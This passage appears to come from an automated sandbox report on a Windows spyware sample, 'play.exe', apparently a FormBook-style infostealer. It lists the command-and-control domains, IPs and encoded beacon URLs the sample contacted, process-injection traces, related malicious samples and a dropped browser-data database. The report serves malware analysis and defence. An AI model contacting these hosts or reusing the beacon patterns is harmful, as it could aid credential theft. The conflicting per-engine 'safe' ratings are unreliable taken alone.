http://www.astrocloud.shop/7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4=	0%	Avira URL Cloud	safe
https://www.hugedomains.com/domain_profile.cfm?d=rantup.com	0%	Avira URL Cloud	safe
http://www.playdoge.buzz/dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM=	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Avira URL Cloud	safe
https://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G	0%	Avira URL Cloud	safe
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	0%	Virustotal		Browse
http://www.rantup.com/49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.ablackwomansmarch.info/byvv/?fVU8=HRzx&ZXzt1jdX=tE8Yf8WYynwECT0ucMl0wg/uU5lgFM4d0lH0abgHpBN2sUJXXfRRiqZbMUuokEJXmaYUQiqZbA9PoCScD7vXiY1sERFkkaBh5gb6EBRxs5CGi9vgIcMFHkg=	0%	Avira URL Cloud	safe
http://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G+FujZTnvobDNePA17XvJlKosOwY30TiI8/8bBp7iesbvq7jnISR7nTIeFXysPRp6fhppRWXfcEPYVY19hX8MgB2Jw=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.x0x9x8x8x7x6.shop	0%	Avira URL Cloud	safe
http://www.rantup.com/49cz/	0%	Avira URL Cloud	safe
http://www.23ddv.top/74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.sssqqq07-22.fun/90p1/	0%	Avira URL Cloud	safe
http://www.soliro.life/qkji/	0%	Avira URL Cloud	safe
http://www.pacoteagil.shop/xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno=	0%	Avira URL Cloud	safe
http://www.23ddv.top/74hi/	0%	Avira URL Cloud	safe
http://www.playdoge.buzz/dkjp/	0%	Avira URL Cloud	safe
http://www.soliro.life/qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.astrocloud.shop/7mxg/	0%	Avira URL Cloud	safe
https://www.google.com	0%	Avira URL Cloud	safe
http://www.farukugurluakdogan.xyz/3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.x0x9x8x8x7x6.shop/ps9q/	0%	Avira URL Cloud	safe
http://www.pilibit.site/ydsb/	0%	Avira URL Cloud	safe
https://www.google.com	0%	Virustotal		Browse
http://www.thinkphp.cn	0%	Avira URL Cloud	safe
http://www.ablackwomansmarch.info/byvv/	0%	Avira URL Cloud	safe
http://www.sssqqq07-22.fun/90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.pilibit.site/ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx	0%	Avira URL Cloud	safe
http://www.shipincheshi.skin/qer4/	0%	Avira URL Cloud	safe
http://www.kiristyle.shop/vod9/	0%	Avira URL Cloud	safe
http://www.farukugurluakdogan.xyz/3yei/	0%	Avira URL Cloud	safe
http://www.pacoteagil.shop/xz0a/	0%	Avira URL Cloud	safe
http://www.thinkphp.cn	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.playdoge.buzz	188.114.97.3	true	true		unknown
hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	52.71.57.184	true	true	0%, Virustotal, Browse	unknown
www.astrocloud.shop	13.248.169.48	true	true		unknown
ablackwomansmarch.info	3.33.130.190	true	true		unknown
natroredirect.natrocdn.com	85.159.66.93	true	true	0%, Virustotal, Browse	unknown
www.x0x9x8x8x7x6.shop	188.114.96.3	true	true		unknown
www.shipincheshi.skin	154.23.176.197	true	true	1%, Virustotal, Browse	unknown
www.soliro.life	3.33.244.179	true	true		unknown
pilibit.site	200.58.111.42	true	true	0%, Virustotal, Browse	unknown
shops.vipshopbuy.com	35.244.245.121	true	false	0%, Virustotal, Browse	unknown
www.dom-2.online	199.59.243.226	true	true	0%, Virustotal, Browse	unknown
pacoteagil.shop	84.32.84.32	true	true		unknown
23ddv.top	154.23.184.218	true	true	0%, Virustotal, Browse	unknown
www.sssqqq07-22.fun	45.113.201.77	true	true		unknown
www.pilibit.site	unknown	unknown	true		unknown
www.farukugurluakdogan.xyz	unknown	unknown	true		unknown
www.23ddv.top	unknown	unknown	true		unknown
www.pelus-pijama-pro.shop	unknown	unknown	true		unknown
www.rantup.com	unknown	unknown	true		unknown
www.pacoteagil.shop	unknown	unknown	true		unknown
206.23.85.13.in-addr.arpa	unknown	unknown	true	1%, Virustotal, Browse	unknown
www.kiristyle.shop	unknown	unknown	true		unknown
www.ablackwomansmarch.info	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.astrocloud.shop/7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4=	true	Avira URL Cloud: safe	unknown
http://www.playdoge.buzz/dkjp/?fVU8=HRzx&ZXzt1jdX=g2307S0kJQiqPtWe9TaGLV4XrhAf17rff9mCmcpeUxXKbAyFV69cgnnV7KzKdCkqPjJMU4CDOpfM3KvXThn0JCzwXjXd5TSeD8+4iPC5x1oijKUfR6VltjM=	true	Avira URL Cloud: safe	unknown
http://www.rantup.com/49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.ablackwomansmarch.info/byvv/?fVU8=HRzx&ZXzt1jdX=tE8Yf8WYynwECT0ucMl0wg/uU5lgFM4d0lH0abgHpBN2sUJXXfRRiqZbMUuokEJXmaYUQiqZbA9PoCScD7vXiY1sERFkkaBh5gb6EBRxs5CGi9vgIcMFHkg=	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G+FujZTnvobDNePA17XvJlKosOwY30TiI8/8bBp7iesbvq7jnISR7nTIeFXysPRp6fhppRWXfcEPYVY19hX8MgB2Jw=&fVU8=HRzx	false	Avira URL Cloud: safe	unknown
http://www.rantup.com/49cz/	true	Avira URL Cloud: safe	unknown
http://www.23ddv.top/74hi/?ZXzt1jdX=nGINNi176Mw32GVF7tlDMHUsDN0FLET+wtq3FMVEcbrakWyJqw7BUNhsS7t1Rgl5P/JWtiTsx+SLLpCMe4oAPWkmauoeOlVhsSF1Co6Ym9oRZTWO7OX8DvA=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.sssqqq07-22.fun/90p1/	true	Avira URL Cloud: safe	unknown
http://www.soliro.life/qkji/	true	Avira URL Cloud: safe	unknown
http://www.pacoteagil.shop/xz0a/?fVU8=HRzx&ZXzt1jdX=R3gP1liecH9CEWR58z6vcTu6ZE4CAT74npPRwlq9MC9LpGUhjUlt5tD2zx/yN6MyUXEHC7bzQwr/lImARbHG2FNXY0baa7q+x6BXcM5hNR/AFuKMUDCbLno=	true	Avira URL Cloud: safe	unknown
http://www.23ddv.top/74hi/	true	Avira URL Cloud: safe	unknown
http://www.playdoge.buzz/dkjp/	true	Avira URL Cloud: safe	unknown
http://www.soliro.life/qkji/?ZXzt1jdX=3hO+HyIcgB6G+8N3LN2uHekX7uSI4ghDkWDZahGxK7g3yB5CU5vB8EVkGOKlqaF5ueualLyQHKnu8Mv7Lxk5XzuYxgHzk6nkrMT1MeRjw16ajjrCjygjRTw=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.astrocloud.shop/7mxg/	true	Avira URL Cloud: safe	unknown
http://www.farukugurluakdogan.xyz/3yei/?ZXzt1jdX=nZxM6ZbVUNvqNiLtXDfR+7LNAf7PNkUZzI4HUL3o8BmDorsgh/n2PsYU59HPtFBmSHz6AM8ZTB8ClF4C+tQS6IhxM8ffpjo9QeQxbJNt08sZUqYfX3nGFAA=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.x0x9x8x8x7x6.shop/ps9q/	true	Avira URL Cloud: safe	unknown
http://www.pilibit.site/ydsb/	true	Avira URL Cloud: safe	unknown
http://www.ablackwomansmarch.info/byvv/	true	Avira URL Cloud: safe	unknown
http://www.sssqqq07-22.fun/90p1/?ZXzt1jdX=MVS+namUa0UQavAdJ03s9uygERI+uY3eTsOcU3Wjrfb6xHYz5dyozzt8oos7zGJG9hFOZSWQuwu+QIVHqyXNg2+Ky1HzvorxqHxW6JBLA1lJwD0Ad7NFYWY=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.pilibit.site/ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx	true	Avira URL Cloud: safe	unknown
http://www.shipincheshi.skin/qer4/	true	Avira URL Cloud: safe	unknown
http://www.kiristyle.shop/vod9/	false	Avira URL Cloud: safe	unknown
http://www.farukugurluakdogan.xyz/3yei/	true	Avira URL Cloud: safe	unknown
http://www.pacoteagil.shop/xz0a/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://duckduckgo.com/ac/?q=	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.hugedomains.com/domain_profile.cfm?d=rantup.com	relog.exe, 00000005.00000002.4105196845.0000000004A46000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000004066000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.kiristyle.shop/vod9/?ZXzt1jdX=ivZzxM4Jfmd0ai63Imd0RTeSPfjP5G	relog.exe, 00000005.00000002.4105196845.000000000508E000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.00000000046AE000.00000004.00000001.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.x0x9x8x8x7x6.shop	aAqvujXSGNo.exe, 00000006.00000002.4106256857.0000000005347000.00000040.80000000.00040000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.ecosia.org/newtab/	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://ac.ecosia.org/autocomplete?q=	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://www.google.com	relog.exe, 00000005.00000002.4105196845.0000000003C24000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.0000000003244000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000007.00000002.2354562437.0000000033C54000.00000004.80000000.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.thinkphp.cn	relog.exe, 00000005.00000002.4105196845.0000000004D6A000.00000004.10000000.00040000.00000000.sdmp, aAqvujXSGNo.exe, 00000006.00000002.4104603679.000000000438A000.00000004.00000001.00040000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	relog.exe, 00000005.00000002.4107100225.0000000007A68000.00000004.00000020.00020000.00000000.sdmp	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
13.248.169.48	www.astrocloud.shop	United States	16509	AMAZON-02US	true
200.58.111.42	pilibit.site	Argentina	27823	DattateccomAR	true
199.59.243.226	www.dom-2.online	United States	395082	BODIS-NJUS	true
84.32.84.32	pacoteagil.shop	Lithuania	33922	NTT-LT-ASLT	true
154.23.184.218	23ddv.top	United States	174	COGENT-174US	true
35.244.245.121	shops.vipshopbuy.com	United States	15169	GOOGLEUS	false
85.159.66.93	natroredirect.natrocdn.com	Turkey	34619	CIZGITR	true
154.23.176.197	www.shipincheshi.skin	United States	174	COGENT-174US	true
45.113.201.77	www.sssqqq07-22.fun	China	137697	CHINATELECOM-JIANGSU-YANGZHOU-IDCCHINATELECOMJiangSuYangZ	true
188.114.97.3	www.playdoge.buzz	European Union	13335	CLOUDFLARENETUS	true
188.114.96.3	www.x0x9x8x8x7x6.shop	European Union	13335	CLOUDFLARENETUS	true
52.71.57.184	hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	United States	14618	AMAZON-AESUS	true
3.33.130.190	ablackwomansmarch.info	United States	8987	AMAZONEXPANSIONGB	true
3.33.244.179	www.soliro.life	United States	8987	AMAZONEXPANSIONGB	true

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502191
Start date and time:	2024-08-31 14:02:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 55s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	7
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	2
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	play.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@5/1@17/14
EGA Information:	Successful, ratio: 80%
HCA Information:	Successful, ratio: 97% Number of executed functions: 15 Number of non-executed functions: 332
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target aAqvujXSGNo.exe, PID 4364 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing disassembly code.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
08:04:13	API Interceptor	10008229x Sleep call for process: relog.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
13.248.169.48	INV20240828.exe	Get hash	malicious	FormBook	Browse	www.healthsolutions.top/cent/
	COM404 PDF.exe	Get hash	malicious	FormBook	Browse	www.opentelemetry.shop/he2a/?9r9Hc=ivWl&NtxTwXO=KCPTlsMcF8eqeRPoupc8NSnF5ATV37tgrRW1pEzwOBbcxu+G1NpS7ZYtf9ZA4e+ZQi383eqNlg==
	quotation.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	www.somon.app/jys5/?pbM=rVxTT&lz=Gv2FWEuKupcxnbQ0F3wuClB9GaJm+HhnnRk0N+Y5EGHs9JmWyVRozS4hAZOY3TSoZ8xeM4DSbtugb4BFcxOd14Bplzi5QjmPlStqozPHXjG7lc9y/dalULA=
	rRFQ.bat.exe	Get hash	malicious	FormBook	Browse	www.study-in-nyc.online/elaa/
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	www.dyme.tech/pjne/
	COMMERCAIL INVOICE AND AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.eworld.org/74ki/
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	www.healthsolutions.top/p2w8/
	DHL AWB TRACKING DETAILS.exe	Get hash	malicious	FormBook	Browse	www.dyme.tech/bduc/
	Bonelessness.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
	roundwood.exe	Get hash	malicious	Simda Stealer	Browse	pupydeq.com/login.php
199.59.243.226	http://cpsenrgy.com	Get hash	malicious	Unknown	Browse	cpsenrgy.com/_tr
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	www.marchingnorth.shop/z97i/
	Paul Meeting Proposal and Schedule.xls	Get hash	malicious	FormBook	Browse	www.foundation-repair.biz/5l7s/
	INV20240828.exe	Get hash	malicious	FormBook	Browse	www.asian-massage-us.xyz/kc69/
	Paul Agrotis List.xls	Get hash	malicious	FormBook	Browse	www.foundation-repair.biz/5l7s/
	8mwXY7Lh2phgnOz.exe	Get hash	malicious	FormBook	Browse	www.972.studio/d16h/?8p4=Yyg0mkT9kWaBGz3P4SAFDjh7bHhcAIEcMMaswnvDe8XCEKQH+wdYsDPfbHrPjzeNnPr0&tZId=0tE43nlx
	bintoday1.exe	Get hash	malicious	FormBook	Browse	www.dom-2.online/6t1p/
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	www.myim.cloud/tqdj/
	Ii4XtPGi5n3AWmt.exe	Get hash	malicious	FormBook	Browse	www.972.studio/d16h/?9rJ0lBX=Yyg0mkT9kWaBGz3P4SAFDjh7bHhcAIEcMMaswnvDe8XCEKQH+wdYsDPfbEHQ7DC2k4Wop+5UnA==&-ZL4f=fTeLVPaHt04H6dK
	factura-630.900.exe	Get hash	malicious	FormBook	Browse	www.dom-2.online/m409/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
natroredirect.natrocdn.com	8htbxM8GPX.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	INV20240828.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	SecuriteInfo.com.Trojan.GenericKD.73942994.9810.18396.xlsx	Get hash	malicious	FormBook	Browse	85.159.66.93
	REQUEST FOR QUOTATION.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	New_Order_Big_Bag_PDF.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	350.xls	Get hash	malicious	FormBook	Browse	85.159.66.93
	Quotation-27-08-24.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
	#U5831#U50f9#U8acb#U6c42 - #U6a23#U672c#U76ee#U9304.vbs	Get hash	malicious	FormBook, GuLoader	Browse	85.159.66.93
	AIDHL3290435890.exe	Get hash	malicious	FormBook	Browse	85.159.66.93
www.x0x9x8x8x7x6.shop	Document_pdf.exe	Get hash	malicious	FormBook	Browse	188.114.97.3
hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com	http://finde-mich-hier.pages.dev/	Get hash	malicious	Unknown	Browse	54.209.32.212
	bSecDbrnMO4yqnP.exe	Get hash	malicious	FormBook, PureLog Stealer	Browse	52.71.57.184
	FXja4SyAYs.exe	Get hash	malicious	Unknown	Browse	54.209.32.212
	Jla3M8Fe16.exe	Get hash	malicious	Unknown	Browse	52.71.57.184
	uTorrent.exe	Get hash	malicious	Unknown	Browse	52.71.57.184
	KY9D34Qh8d.exe	Get hash	malicious	Unknown	Browse	52.71.57.184
	1AIemYSAZy.exe	Get hash	malicious	Glupteba, LummaC Stealer, SmokeLoader, Stealc	Browse	54.209.32.212
	PO-5299.xls	Get hash	malicious	FormBook	Browse	52.71.57.184
	executable.2772.exe	Get hash	malicious	Unknown	Browse	54.209.32.212
	SKMBT_C9020112023_PDF.exe	Get hash	malicious	FormBook	Browse	54.209.32.212
www.dom-2.online	bintoday1.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	factura-630.900.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	PAGO $630.900.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	IMG_00991ORDER_FILES.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.226
	Debit note Jan-Jul 2024.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	TRIAL_ORDER_OTHERS.exe	Get hash	malicious	FormBook, GuLoader	Browse	199.59.243.226

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
NTT-LT-ASLT	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	LPO 92558 & 92669.exe	Get hash	malicious	FormBook	Browse	84.32.84.88
	GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Curriculum Vitae.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	quotation.exe	Get hash	malicious	DarkTortilla, FormBook	Browse	84.32.84.32
	Scan_000019921929240724_PDA _ SOA_Payment Reference TR-37827392-2024-08-29.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	factura-630.900.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	PAGO $630.900.exe	Get hash	malicious	FormBook	Browse	84.32.84.32
	Payment_Advice.exe	Get hash	malicious	FormBook, GuLoader	Browse	84.32.84.32
BODIS-NJUS	http://cpsenrgy.com	Get hash	malicious	Unknown	Browse	199.59.243.226
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Paul Meeting Proposal and Schedule.xls	Get hash	malicious	FormBook	Browse	199.59.243.226
	INV20240828.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Paul Agrotis List.xls	Get hash	malicious	FormBook	Browse	199.59.243.226
	8mwXY7Lh2phgnOz.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	bintoday1.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	ORDER_38746_pdf.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	Ii4XtPGi5n3AWmt.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
	factura-630.900.exe	Get hash	malicious	FormBook	Browse	199.59.243.226
AMAZON-02US	https://grand-pika-f642c4.netlify.app/#mthatha@africawsp.co.za	Get hash	malicious	Unknown	Browse	99.86.8.175
	SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elf	Get hash	malicious	Mirai	Browse	13.226.40.92
	SecuriteInfo.com.Linux.Siggen.9999.19003.7982.elf	Get hash	malicious	Mirai	Browse	35.183.153.119
	http://security-azure.b-cdn.net/	Get hash	malicious	Unknown	Browse	18.245.60.57
	https://found.ee/5PKNr	Get hash	malicious	Unknown	Browse	18.239.50.3
	https://metamaskloginsec.webflow.io/	Get hash	malicious	Unknown	Browse	52.222.232.47
	http://pub-b45566d514fd4d768fd9c206a669ef8a.r2.dev/bea275.html	Get hash	malicious	Unknown	Browse	18.192.231.252
	http://pub-d208809bd4ab41638cad37b39b3b931d.r2.dev/home.html	Get hash	malicious	Unknown	Browse	13.227.219.3
	http://free-5437404.webadorsite.com/	Get hash	malicious	HTMLPhisher	Browse	143.204.215.5
	https://ipfs.io/ipfs/bafkreiefwh3zxxltcpmcssu4253x5djs5ybtnn74zwc2o3fxssxo3y2u3i	Get hash	malicious	Unknown	Browse	13.35.58.119
COGENT-174US	SecuriteInfo.com.Linux.Siggen.9999.15938.22369.elf	Get hash	malicious	Mirai	Browse	206.84.128.143
	SecuriteInfo.com.Linux.Siggen.9999.28313.2324.elf	Get hash	malicious	Mirai	Browse	206.84.216.147
	SecuriteInfo.com.Linux.Siggen.9999.19003.7982.elf	Get hash	malicious	Mirai	Browse	149.100.17.45
	ORDER_pdf.exe	Get hash	malicious	FormBook	Browse	38.47.207.180
	INV20240828.exe	Get hash	malicious	FormBook	Browse	154.23.184.240
	sora.ppc.elf	Get hash	malicious	Unknown	Browse	154.50.188.238
	sora.sh4.elf	Get hash	malicious	Mirai	Browse	38.162.216.88
	sora.spc.elf	Get hash	malicious	Mirai	Browse	149.46.157.165
	sora.arm.elf	Get hash	malicious	Mirai	Browse	38.151.1.113
	GOVT __OF SHARJAH - UNIVERSITY OF SHARJAH - Project 0238.exe	Get hash	malicious	FormBook	Browse	38.177.162.196
DattateccomAR	b2bXo6vmDm.exe	Get hash	malicious	SystemBC	Browse	200.58.110.158
	hNX3ktCRra.elf	Get hash	malicious	Unknown	Browse	200.58.122.206
	http://www.prodismo.com/	Get hash	malicious	Unknown	Browse	200.58.112.248
	http://www.prodismo.com/	Get hash	malicious	Unknown	Browse	200.58.112.248
	http://www.prodismo.com/	Get hash	malicious	Unknown	Browse	200.58.112.248
	https://radiobravafm.com.ar/articulo/config/login.php?	Get hash	malicious	Outlook Phishing, HTMLPhisher	Browse	200.58.110.199
	t5SYVk0Tkt.exe	Get hash	malicious	PureLog Stealer, SystemBC	Browse	200.58.111.55
	http://reveries.fr/signatux/redirect.php?p=http://watercycling.com.ar/img/en/Earthcore/?uid=ryan@proctorlane.com	Get hash	malicious	Unknown	Browse	200.58.111.23
	http://estudiolynch.com/ax	Get hash	malicious	Unknown	Browse	200.58.112.68
	https://www.onlinesiro.com.ar/wp-admin/css/colors/ocean/html/html/home/nkl-log.php/	Get hash	malicious	Unknown	Browse	200.58.111.14

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

C:\Users\user\AppData\Local\Temp\--x702s3

Download File

Process:	C:\Windows\SysWOW64\relog.exe
File Type:	SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	114688
Entropy (8bit):	0.9746603542602881
Encrypted:	false
SSDEEP:	192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
MD5:	780853CDDEAEE8DE70F28A4B255A600B
SHA1:	AD7A5DA33F7AD12946153C497E990720B09005ED
SHA-256:	1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
SHA-512:	E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
Malicious:	false
Reputation:	high, very likely benign file
Preview:	SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
